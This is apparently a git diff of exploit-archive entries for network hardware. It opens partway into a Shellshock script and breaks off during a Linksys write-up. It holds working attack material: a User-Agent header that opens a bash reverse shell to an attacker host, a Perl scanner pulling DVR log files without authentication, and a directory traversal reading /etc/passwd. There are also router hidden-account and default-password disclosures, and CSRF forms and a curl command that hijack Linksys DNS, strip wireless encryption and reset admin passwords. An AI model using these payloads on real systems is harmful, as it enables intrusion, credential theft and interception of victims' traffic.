"[*] Usage: " + print "[*]" + print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" + print "[*] Listener: nc -lvp " + print "\n" + sys.exit() + +#Disables request warning for cert validation ignore. +requests.packages.urllib3.disable_warnings() +ucs = sys.argv[1] +url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" +attackhost = sys.argv[2] +revshellport = sys.argv[3] +headers1 = { + 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' + } +headers2 = { + "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(http://[ip]/goform/QuickStart_c0 - =>source - =>password disclosure on 'Input typepassword' - -# verification on www.skynet.be - -# Vulnerability Found By NeoCoderz - -# mail:NeoCoderz1@msn.com - fReNcH HaCkInG Is NoT dEaD ... - eNjoY iT .... ---------------------------------------------------------------------------------- - -# milw0rm.com [2007-12-18] +-------------------------------------------------------------------------------- + +# WebServer powered by goahead WEBSERVER + +# Vulnerability on : FS4104-AW - Full-Service VDSL Device + +# exemple : IP : 81.240.1.1 to 81.240.1.254 / port : 80 + +# exploit : =>http://[ip]/goform/QuickStart_c0 + =>source + =>password disclosure on 'Input typepassword' + +# verification on www.skynet.be + +# Vulnerability Found By NeoCoderz + +# mail:NeoCoderz1@msn.com + fReNcH HaCkInG Is NoT dEaD ... + eNjoY iT .... +--------------------------------------------------------------------------------- + +# milw0rm.com [2007-12-18] diff --git a/platforms/hardware/remote/4797.pl b/platforms/hardware/remote/4797.pl index fe0d1db0c..323135850 100755 --- a/platforms/hardware/remote/4797.pl +++ b/platforms/hardware/remote/4797.pl @@ -1,101 +1,101 @@ -#!/usr/bin/perl -# -# March Networks DVR 3204 Logfile Information Disclosure Exploit -# -# Since configuration of the IP address, user console and root is -# carried out over the "administrator console", the vulnerability -# lies within Watchdog's HTTP server application. -# -# Any user can obtain the log files without authentication by accessing -# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder -# can then uncompress the tar file and access the config.dat to reveal -# username and passwords, names of devices, and IP addresses of other -# security components attached to the corporate networ -# -# More details: -# http://www.sybsecurity.com/resources/static/ -# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf -# -# By Alex Hernandez ahernandez [at] sybsecurity [dot] com -# -# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80 -# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80 -# -# $ perl -x dvr3204_exp.pl 10.50.10.246:80 -# Trying... -# -# THIS HOST IS VULNERABLE!!! :-) -# Check the details on w w w [dot] sybsecurity [dot] c o m -# -# THIS HOST IS NOT VULNERABLE :-( -# Check the settings on browser... -# -# - -use Socket; - -if ($#ARGV<0) {die " -\nMarch Networks DVR 3204 exploit\n -More details: http://www.sybsecurity.com -By Alex Hernandez\n -ahernandez [at] sybsecurity [dot] com\n - -Usage: perl -x $0 www.marchnetworks.com:80 -Usage: perl -x $0 127.0.0.1:80\n\n";} - -($host,$port)=split(/:/,@ARGV[0]); - -print "Trying...\n\n"; -$target = inet_aton($host); -$flag=0; - -my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n"); -foreach $line (@results){ - if ($line =~ /Directory/) {$flag=1;}} - -if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n -Check the details on www [dot] sybsecurity [dot] com\n";} -else {print "THIS HOST IS NOT VULNERABLE :-( \n -Check the settings on browser...\n";} - -sub sendraw { - my ($pstr)=@_; - socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || - die("Socket problems\n"); - if(connect(S,pack "SnA4x8",2,$port,$target)){ - my @in; - select(S); $|=1; print $pstr; - while(){ push @in, $_;} - select(STDOUT); close(S); return @in; - } else { die("Can't connect check the port or address...\n"); } -} - -# milw0rm.com [2007-12-27] +#!/usr/bin/perl +# +# March Networks DVR 3204 Logfile Information Disclosure Exploit +# +# Since configuration of the IP address, user console and root is +# carried out over the "administrator console", the vulnerability +# lies within Watchdog's HTTP server application. +# +# Any user can obtain the log files without authentication by accessing +# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder +# can then uncompress the tar file and access the config.dat to reveal +# username and passwords, names of devices, and IP addresses of other +# security components attached to the corporate networ +# +# More details: +# http://www.sybsecurity.com/resources/static/ +# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf +# +# By Alex Hernandez ahernandez [at] sybsecurity [dot] com +# +# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80 +# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80 +# +# $ perl -x dvr3204_exp.pl 10.50.10.246:80 +# Trying... +# +# THIS HOST IS VULNERABLE!!! :-) +# Check the details on w w w [dot] sybsecurity [dot] c o m +# +# THIS HOST IS NOT VULNERABLE :-( +# Check the settings on browser... +# +# + +use Socket; + +if ($#ARGV<0) {die " +\nMarch Networks DVR 3204 exploit\n +More details: http://www.sybsecurity.com +By Alex Hernandez\n +ahernandez [at] sybsecurity [dot] com\n + +Usage: perl -x $0 www.marchnetworks.com:80 +Usage: perl -x $0 127.0.0.1:80\n\n";} + +($host,$port)=split(/:/,@ARGV[0]); + +print "Trying...\n\n"; +$target = inet_aton($host); +$flag=0; + +my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n"); +foreach $line (@results){ + if ($line =~ /Directory/) {$flag=1;}} + +if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n +Check the details on www [dot] sybsecurity [dot] com\n";} +else {print "THIS HOST IS NOT VULNERABLE :-( \n +Check the settings on browser...\n";} + +sub sendraw { + my ($pstr)=@_; + socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || + die("Socket problems\n"); + if(connect(S,pack "SnA4x8",2,$port,$target)){ + my @in; + select(S); $|=1; print $pstr; + while(){ push @in, $_;} + select(STDOUT); close(S); return @in; + } else { die("Can't connect check the port or address...\n"); } +} + +# milw0rm.com [2007-12-27] diff --git a/platforms/hardware/remote/4941.txt b/platforms/hardware/remote/4941.txt index 438a6627d..60e543dfa 100755 --- a/platforms/hardware/remote/4941.txt +++ b/platforms/hardware/remote/4941.txt @@ -1,67 +1,67 @@ -## -## VULNERABILITY: -## -## Belkin Wireless G Plus MIMO Router F5D9230-4 -## Authentication Bypass Vulnerability -## -## -## AUTHOR: -## -## DarkFig < gmdarkfig (at) gmail (dot) com > -## http://acid-root.new.fr/?0:17 -## #acidroot@irc.worldnet.net -## -## -## INTRODUCTION: -## -## I recently bought this router for my local -## network (without modem integrated), now I can tell -## that it was a bad choice. When my ISP disconnects -## me from internet, in the most case I have to reboot -## my Modem and the Router in order to reconnect. -## So I coded a program (which send http packets) to reboot -## my router, it asks me the router password, and reboots it. -## One day I wrote a bad password, but it worked. So I -## decided to make some tests in order to see if there was -## a vulnerability. -## -## -## DESCRIPTION: -## -## Apparently when the router starts, it creates a file -## (without content) named user.conf, then when we go to -## SaveCfgFile.cgi, the configuration is saved to the file -## user.conf. But the problem is that we can access to the -## file SaveCfgFile.cgi without login. -## -## -## PROOF OF CONCEPT: -## -## For example we can get the configuration file here: -## http:///SaveCfgFile.cgi -## -## pppoe_username=... -## pppoe_password=... -## wl0_pskkey=... -## wl0_key1=... -## mradius_password=... -## mradius_secret=... -## httpd_password=... -## http_passwd=... -## pppoe_passwd=... -## -## -## Tested on the latest firmware for this product -## (version 3.01.53). -## -## -## PATCH: -## -## Actually (08-01-19) there is no firmware update, but I -## contacted the author, if they'll release a patch, it -## will be available here: -## http://web.belkin.com/support/download/download.asp -## ?download=F5D9230-4&lang=1&mode= -## - -# milw0rm.com [2008-01-20] +## +## VULNERABILITY: +## +## Belkin Wireless G Plus MIMO Router F5D9230-4 +## Authentication Bypass Vulnerability +## +## +## AUTHOR: +## +## DarkFig < gmdarkfig (at) gmail (dot) com > +## http://acid-root.new.fr/?0:17 +## #acidroot@irc.worldnet.net +## +## +## INTRODUCTION: +## +## I recently bought this router for my local +## network (without modem integrated), now I can tell +## that it was a bad choice. When my ISP disconnects +## me from internet, in the most case I have to reboot +## my Modem and the Router in order to reconnect. +## So I coded a program (which send http packets) to reboot +## my router, it asks me the router password, and reboots it. +## One day I wrote a bad password, but it worked. So I +## decided to make some tests in order to see if there was +## a vulnerability. +## +## +## DESCRIPTION: +## +## Apparently when the router starts, it creates a file +## (without content) named user.conf, then when we go to +## SaveCfgFile.cgi, the configuration is saved to the file +## user.conf. But the problem is that we can access to the +## file SaveCfgFile.cgi without login. +## +## +## PROOF OF CONCEPT: +## +## For example we can get the configuration file here: +## http:///SaveCfgFile.cgi +## +## pppoe_username=... +## pppoe_password=... +## wl0_pskkey=... +## wl0_key1=... +## mradius_password=... +## mradius_secret=... +## httpd_password=... +## http_passwd=... +## pppoe_passwd=... +## +## +## Tested on the latest firmware for this product +## (version 3.01.53). +## +## +## PATCH: +## +## Actually (08-01-19) there is no firmware update, but I +## contacted the author, if they'll release a patch, it +## will be available here: +## http://web.belkin.com/support/download/download.asp +## ?download=F5D9230-4&lang=1&mode= +## + +# milw0rm.com [2008-01-20] diff --git a/platforms/hardware/remote/5113.txt b/platforms/hardware/remote/5113.txt index fad3813a7..d2be2e656 100755 --- a/platforms/hardware/remote/5113.txt +++ b/platforms/hardware/remote/5113.txt @@ -1,41 +1,41 @@ -.:[ Philips VOIP841 Multiple Vulnerabilities ]:. -Luca "ikki" Carettoni - luca.carettoni@ikkisoft.com - -Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd) -Systems not affected: n/a - -(a) Hidden Administration Account (web management console) - -service:service - -(b) Directory Listing, Directory Traversal - -jungle ikki $ telnet 192.168.1.10 80 -Trying 192.168.1.10... -Connected to 192.168.1.10. -Escape character is '^]'. -GET /../../../../../../../../etc/passwd HTTP/1.0 -Host: 192.168.1.10 -Authorization: Basic c2VydmljZTpzZXJ2aWNl - -HTTP/1.0 200 OK -Content-type: text/plain -Expires: Sat, 24 May 1980.7:00:00.GMT -Pragma: no-cache -Server: simple httpd 1.0 - -root:x:0:0:root:/root:/bin/bash -demo:x:5000:100:Demo User:/home/demo:/bin/bash -nobody:x:65534:65534:Nobody:/htdocs:/bin/bash -Connection closed by foreign host. - -(c) Cross Site Scripting (XSS) inside the 404 standard response page - -GET /var/htdocs/ HTTP/1.0 - -(d) Insecure Storage (Skype credentials, web management console passwords, ...) - -/var/jffs2/data/save.dat -/tmp/apply.log - -# milw0rm.com [2008-02-14] +.:[ Philips VOIP841 Multiple Vulnerabilities ]:. +Luca "ikki" Carettoni - luca.carettoni@ikkisoft.com + +Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd) +Systems not affected: n/a + +(a) Hidden Administration Account (web management console) + +service:service + +(b) Directory Listing, Directory Traversal + +jungle ikki $ telnet 192.168.1.10 80 +Trying 192.168.1.10... +Connected to 192.168.1.10. +Escape character is '^]'. +GET /../../../../../../../../etc/passwd HTTP/1.0 +Host: 192.168.1.10 +Authorization: Basic c2VydmljZTpzZXJ2aWNl + +HTTP/1.0 200 OK +Content-type: text/plain +Expires: Sat, 24 May 1980.7:00:00.GMT +Pragma: no-cache +Server: simple httpd 1.0 + +root:x:0:0:root:/root:/bin/bash +demo:x:5000:100:Demo User:/home/demo:/bin/bash +nobody:x:65534:65534:Nobody:/htdocs:/bin/bash +Connection closed by foreign host. + +(c) Cross Site Scripting (XSS) inside the 404 standard response page + +GET /var/htdocs/ HTTP/1.0 + +(d) Insecure Storage (Skype credentials, web management console passwords, ...) + +/var/jffs2/data/save.dat +/tmp/apply.log + +# milw0rm.com [2008-02-14] diff --git a/platforms/hardware/remote/5150.txt b/platforms/hardware/remote/5150.txt index 7836aacac..d94f10394 100755 --- a/platforms/hardware/remote/5150.txt +++ b/platforms/hardware/remote/5150.txt @@ -1,48 +1,48 @@ -Thecus N5200Pro NAS Server Control Panel Remote File İnclude - - -Author : Crackers_Child - -Mail : cashr00t@hotmail.com - -Bug in : usrgetform.html - - - - - - -Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? - -İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 - -Greetz: Str0ke - -# milw0rm.com [2008-02-18] +Thecus N5200Pro NAS Server Control Panel Remote File İnclude + + +Author : Crackers_Child + +Mail : cashr00t@hotmail.com + +Bug in : usrgetform.html + + + + + + +Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? + +İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 + +Greetz: Str0ke + +# milw0rm.com [2008-02-18] diff --git a/platforms/hardware/remote/5289.txt b/platforms/hardware/remote/5289.txt index 6724d7f3e..31bdce82e 100755 --- a/platforms/hardware/remote/5289.txt +++ b/platforms/hardware/remote/5289.txt @@ -1,33 +1,33 @@ -Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability -Release Date: 10 March 2008 -Discover: Pranav Joshi -Vendor: ZyXEL -Products Affected: ZyWALL - -(Status on other affected products & firmwares pending from vendor’s end) - - CVE-2008-1160 - - BID 28184 - ---------------------------- - -Technical Details - ---------------------------- - -The vulnerability in the Quagga/Zebra routing daemon, exists due to the -fact that the appliance fails to change the password needed to login -into the Quagga/Zebra daemon running on ports 2601, 2602 (Quagga/RIP) & -2604 (Quagga/OSPF) /TCP, even though the password of the appliance has -been changed an attacker can still use the default password ‘zebra’ to -log into the Quagga/Zebra service to view and manipulate the routing -information etc. of the appliance. - -The vulnerability was discovered on ZyWall 1050 appliance other versions -could be affected as well. - -Information on other vulnerable products and firmwares is pending from -the vendor’s end. - -# milw0rm.com [2008-03-21] +Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability +Release Date: 10 March 2008 +Discover: Pranav Joshi +Vendor: ZyXEL +Products Affected: ZyWALL + +(Status on other affected products & firmwares pending from vendor’s end) + + CVE-2008-1160 + + BID 28184 + +--------------------------- + +Technical Details + +--------------------------- + +The vulnerability in the Quagga/Zebra routing daemon, exists due to the +fact that the appliance fails to change the password needed to login +into the Quagga/Zebra daemon running on ports 2601, 2602 (Quagga/RIP) & +2604 (Quagga/OSPF) /TCP, even though the password of the appliance has +been changed an attacker can still use the default password ‘zebra’ to +log into the Quagga/Zebra service to view and manipulate the routing +information etc. of the appliance. + +The vulnerability was discovered on ZyWall 1050 appliance other versions +could be affected as well. + +Information on other vulnerable products and firmwares is pending from +the vendor’s end. + +# milw0rm.com [2008-03-21] diff --git a/platforms/hardware/remote/5926.txt b/platforms/hardware/remote/5926.txt index 5fc444aa0..e35f797f5 100755 --- a/platforms/hardware/remote/5926.txt +++ b/platforms/hardware/remote/5926.txt @@ -1,351 +1,351 @@ - __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ - | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ - | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y - | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | - | Y | | | | || || | | | | | || / | __ | | | | || _] | | - | . | j l | | |l || | j l | | || || T j l | | || T l ! - l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/ - - <>< | ><> Hacking the Linksys WRT54G #2 - <>< | ><> https://kinqpinz.info/ - <>< | ><> by meathive - <>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com - - -++| CVE-2008-1247 ----------------------- -The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials -when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via -a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, -(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, -(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, -(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. -NOTE: the Security.tri vector is already covered by CVE-2006-5202. - -++| Intro ----------------------- -This text is in addition to the findings I have already made public regarding the Linksys WRT54G -wireless router and firewall gateway device. The scripts that process configuration changes do not -require authentication and therefore can be altered _remotely_ via simple form submissions written -in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous -findings and the demo page with sample exploits. - -++| Let's Get Dirty ----------------------- -You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows -how forms can be constructed in HTML that take advantage of the major flaws present within the -insecure router. In my previous documentation I showed how it is possible to alter configuration -parameters both via Linux command line using curl and HTML form submissions. In this text I -demonstrate how to do these very same things transparently using a combination of HTML form -construction with JavaScript that automagically submits our desired changes. - -The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will -redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO -AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all -that is required in order to submit our form that will be constructed using GET parameters observed -from the device's Web interface. - -document.f.submit(); - -This submits forms hidden within the Webpage. Our first example code enables wireless access with an -SSID of our choosing. In this instance, I will use the SSID "kinqpinz". - - - - - - - - - - - - - - -The reason this works is simple: configuration parameters are constructed in the URL in the Web -interface, hosted by default at the address http://192.168.1.1. One can view these parameters while -configuring their device. The code above simply constructs a URL that is processed by the router's -IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: - -http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en - -It's simple enough to understand what's going on. Each variable passed in the URL describes exactly -what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part -to exploiting the router is the fact that you cannot alter settings using a URL like the one above. -That would result in a GET request on behalf of the device, whereas we're interested in POST -requests that actually trigger configuration changes. A GET request does nothing. Below I describe -a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, -and a touch of PHP to grab the mark's external IP. - -++| Remote Real World Attack Scenario ----------------------- -So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It -has made a few assumptions about your environment, however. One major assumption is that you've -kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes -you've made to the router in terms of security, e.g., strong password, wireless encryption, access -restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do -NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so -that you do not fall victim to a malicious individual hosting code that will be presented in this -text. - -++| Remote Real World Attack Scenario Requirements ----------------------- -On http://www.hacker.tld a page is hosted that contains the following: - (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; - (2) JavaScript that submits these forms transparently; - (3) PHP or similar server-side code that acquires the mark's external IP address as they browse - the page; and, - (4) PHP or similar server-side code that retains the mark's external IP address in the event that - the remote form submission is successful, thus allowing the remote attacker to further exploit the - device. - -http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP -is used - though any server-side language is suitable - for obtaining the external IP of any -individual viewing the exploit page and writes this information to a log file. - - -The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute -and submitting the form. - - - -All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the -HTML form's 'hidden' attribute. - -
- - - - - - - - - - -
- -What you should observe from this is the form name of "f" which is used in the JS to submit the form -as well as the various 'name' and 'value' attributes that are used to create a URL such as this: - -submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en - -Do note that without any one of these parameters, the exploit fails and nothing changes. All of the -elements must remain in place even if they do not directly make sense. They are simply options that -the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case -matters and do not forget that the request must be POST, not GET. Also different config changes -require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. - -Now that the malicious page has been composed and sits online living and waiting for marks at -http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom -PHP logging script. In mark.txt, our logging file, sample output would resemble something like the -following. - -Potential mark resides at 1.1.1.1 - -Potential mark resides at 2.2.2.2 - -Potential mark resides at 3.3.3.3 - -So forth... - -They are potential marks because it is unknown whether or not they are using the WRT54G with a -supported firmware version that is exploitable using these techniques, and/or the exploit attempt -failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not -using the default local address (good for them) that this attack relies on. - -When they browse the page, because we have set no timeout for this change to occur, they are -instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, -does not inform the user if they were educated enough of what has just happened, so they may -continue on doing whatever they were doing, more often than not unaware of what has just happened. -At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at -our leisure and further test the remote host whether or not they are vulnerable to attack. At the -very least, we may decide to completely reset the router to rest assured we know its current state -to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. -This is quite feasible, here's how. - -
- - - -
- -This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en - -Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs -all incoming and outgoing requests before passing them on to the next in line. - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- -This is indeed convoluted but all of these values must be in place in order to be successful. What -is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our -own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, -and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while -obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the -following URL that is submitted to http://192.168.1.1/Basic.tri. - -http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en - -++| An Alternative (with JavaScript) ----------------------- -This is the basic exploitation method of the router although the attacker has many alternatives of -submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. -A few alternative methods would include using a JavaScript onClick function within a standard -looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: - -This looks innocent enough. - -...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this -standard looking navigation link, e.g.: - -var xhr=false; -if(window.XMLHttpRequest) { - xhr=new XMLHttpRequest(); -} else if(window.ActiveXObject) { - xhr=new ActiveXObject("Microsoft.XMLHTTP"); -} -function xhrRequest() { - if(xhr) { - xhr.open("POST", "http://192.168.1.1/Security.tri", true); - xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); - xhr.onreadystatechange=function() { - if(xhr.readyState == 4 && xhr.status == 200) { - var success=xhr.responseText; - } - } - xhr.send("SecurityMode=0&layout=en"); - } -} - -The example above effectively disables all wireless encryption so that if you happen to live close -enough to this poor individual, it is your duty to pwn their wireless by enabling open access for -everybody in the neighborhood! Here's the URL for disabling wireless encryption: - -http://192.168.1.1/Security.tri?SecurityMode=0&layout=en - -++| An Alternative (without JavaScript) ----------------------- -You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + -NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent -looking methods of compromising your WRT54G. For example, user registration for a bulletin board or -forum system. The site must acquire a minimal amount of information in order to create the account -so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to -enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the -URL once again: - -http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en - -Again it is a different script processing the request on behalf of the router's internal operating -system, dmz.tri, but it still does not require authentication prior to changing the settings we wish -to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: - -
- - - - - -...and add these values to their user registration page with standard username/password/e-mail fields... - - Username:
- Password:
- Confirm Password:
- -
- -...that can be found on traditional forums these days. The mark submits and exploits his/her own -router although they believe they are at least minimally technically savvy by using a combination of -technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms -we use to store the router configs are hidden, and the normal user registration forms are not, thus -it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has -detected that a potential attack is taking place it is likely too late as the mastermind behind -http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up -targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration -changes within 10 seconds, which is plenty of time for them to open another terminal and change the -administrative login to block our mark from changing their settings, e.g.: - -curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri - -Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ -monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords -via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the -router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. - -++| Conclusion ----------------------- -It is my intention in finalizing this document that the reader understands that the Linksys WRT54G -firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care -whether or not you have the level of privilege thought to be necessary for manipulating sensitive -objects. - -Thanks go to hw2B for suggesting I write all of this garbage out. - -++| URLs ----------------------- -https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) -https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) -https://kinqpinz.info/lib/wrt54g/own2.txt (this document) -http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247) - -# milw0rm.com [2008-06-24] + __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ + | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ + | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y + | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | + | Y | | | | || || | | | | | || / | __ | | | | || _] | | + | . | j l | | |l || | j l | | || || T j l | | || T l ! + l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/ + + <>< | ><> Hacking the Linksys WRT54G #2 + <>< | ><> https://kinqpinz.info/ + <>< | ><> by meathive + <>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com + + +++| CVE-2008-1247 +---------------------- +The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials +when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via +a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, +(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, +(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, +(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. +NOTE: the Security.tri vector is already covered by CVE-2006-5202. + +++| Intro 